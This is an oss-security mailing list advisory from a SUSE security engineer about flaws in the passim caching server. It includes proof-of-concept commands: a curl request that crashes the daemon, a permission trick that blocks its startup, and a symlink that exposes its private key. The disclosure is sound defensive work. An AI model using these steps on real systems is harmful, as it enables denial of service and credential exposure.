Date: Fri, 27 Oct 2023 15:25:16 +0200 From: Matthias Gerstner <mgerstner@...e.de> To: oss-security@...ts.openwall.com Subject: Security issues in passim local caching server Hello list, this is a report about findings in the passim  local caching server. 1) Introduction =============== Passim is a relatively new project for a local caching server that helps distributing publicly available files in local networks to save network bandwidth. It is a dependency of new fwupd  releases, which is why it has come to our attention. Passim consists of a daemon component running as a separate passim user and group. The daemon offers a local D-Bus interface over which only the root user may publish or unpublish files on the network. Non-root users may only inspect the available items via D-Bus. Furthermore the daemon announces all cached items via the Ahavi discovery protocol. For retrieval of individual items a small libsoup based HTTP server is integrated into the daemon, listening on port 25000. A small command line programm `passim` allows to interact with the daemon's D-Bus interface. The findings in this report are based on the upstream release tag 0.1.3. 2) Findings =========== 2.1) Remote DoS Against `passimd` by Triggering NULL Pointer Dereference ------------------------------------------------------------------------ When accessing a URL different from the root "/" and without passing any parameters "?" then a segmentation fault is the result in passim-server.c:751 (null pointer dereference, because there is no request). Example: root# curl -v -k 'https://localhost:27500/myfile' root# journalctl -u passim.service | tail -n 5 Oct 25 12:45:24 mybox passimd: accepting HTTP/1.1 GET /myfile from ::1:39278 (loopback) Oct 25 12:45:24 mybox passimd: g_strsplit: assertion 'string != NULL' failed Oct 25 12:45:29 mybox systemd: passim.service: Main process exited, code=dumped, status=11/SEGV Oct 25 12:45:29 mybox systemd: passim.service: Failed with result 'core-dump'. Upstream has library settings in effect to abort on failing assertions instead of trying to continue, to prevent possible memory access errors from becoming exploitable. This issue is fixed via upstream commit 1f7bcea . 2.2) Serving Static Files from a Directory owned by Unprivileged Users ---------------------------------------------------------------------- Passim supports the configuration of static directories on the local file system, whose content will be processed and published upon startup. Consider a directory controlled by 'nobody': root# cat /etc/passim.d/nobody.conf [passim] Path=/var/lib/nobody/passim There's two things that I found problematic in such a scenario. ### a) Placing Inaccessible Files in the Directory root# sudo -u nobody -g nobody /bin/bash nobody$ mkdir /var/lib/nobody/passim nobody$ touch /var/lib/nobody/passim/somefile nobody$ chmod 000 /var/lib/nobody/passim/somefile This will prevent future starts of `passimd`: root# systemctl restart passim.service Job for passim.service failed because the control process exited with error code. See "systemctl status passim.service" and "journalctl -xeu passim.service" for details. root# journalctl -u passim.service | tail -n 6 Oct 25 12:56:58 mybox passimd: scanning /var/lib/nobody/passim Oct 25 12:56:58 mybox passimd: failed to scan sysconfpkg directory: Error opening file /var/lib/nobody/passim/somefile: Permission denied Oct 25 12:56:58 mybox systemd: passim.service: Main process exited, code=exited, status=1/FAILURE Oct 25 12:56:58 mybox systemd: passim.service: Failed with result 'exit-code'. Oct 25 12:56:58 mybox systemd: Failed to start Local Caching Server. This opens a local DoS vector against passimd for the unprivileged user that owns the directory. This is also valid for other situations like a FIFO placed there, broken symlinks or symlinks to inaccessible locations as well as race conditions (time of readdir() vs. time of open()). This has at least partially been addressed by upstream commit f4c34bd3. ### b) Placing Symlinks to Otherwise Inaccessible Data in the Directory Although `passimd` runs with low privileges by default there are some interesting files that a local attacker might want to get their hands on. Since `passimd` follows symlinks in the directory one could try to "publish" files from /proc/<pidof passimd> by placing symlinks. This is somewhat difficult though, since a race condition has to be won (the PID of a starting `passimd` needs to be known to place a proper symlink). Also there are not that many interesting files in there I believe. E.g. /proc/<pid>/mem cannot be shared this way, since it cannot be read sequentially. A much simpler attack is to publish the SSL private key of `passimd` though: root# sudo -u nobody -g nobody /bin/bash nobody$ mkdir /var/lib/nobody/passim nobody$ ln -s /var/lib/passim/secret.key /var/lib/nobody/passim/secret root# systemctl restart passim.service root# passim dump passimd is running 1c69e7e4d7b7ed655eafa94942a5ef04f7c7688a0519be387133176154f58fe6 secret size:2.5 kB root# sha256sum /var/lib/passim/secret.key 1c69e7e4d7b7ed655eafa94942a5ef04f7c7688a0519be387133176154f58fe6 /var/lib/passim/secret.key From here on the local attacker can simply download the now shared "secret key" from localhost. It has to be noted that this SSL private key has no security purpose in passimd but only serves to prevent network traffic security scanners from raising alarm over unencrypted traffic. Thus currently there is no known information leak using this attack that has attacker value. It is still crossing of a security boundary and could be problematic in the future. Upstream issue #26  deals with this issue but is not yet completely fixed, due to a remaining race condition. Bugfix Release and Upstream Reporting ===================================== I reported these issues to the upstream author on 2023-10-25. No coordinated disclosure was desired so bugfixes have been and still are developed publicly over the GitHub issue tracker. There are some disagreements with upstream about whether these issues are qualifying as security issues. I believe they are. Due to this no CVEs have been assigned as of now. Passim is packaged, to my knowledge, in Fedora Linux and Arch Linux already. Otherwise it should not be widespread. Upstream is working on a new release of Passim containing fixes for these and some other non-security issues I reported as well. References ========== : https://github.com/hughsie/passim : https://github.com/fwupd/fwupd : https://github.com/hughsie/passim/issues/25 : https://github.com/hughsie/passim/commit/4cba26103daab69aedf584ae3a69ba48f4c34bd3 : https://github.com/hughsie/passim/issues/26 Cheers Matthias -- Matthias Gerstner <matthias.gerstner@...e.de> Security Engineer https://www.suse.com/security GPG Key ID: 0x14C405C971923553 SUSE Software Solutions Germany GmbH HRB 36809, AG Nürnberg Geschäftsführer: Ivo Totev, Andrew McDonald, Werner Knoblich Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.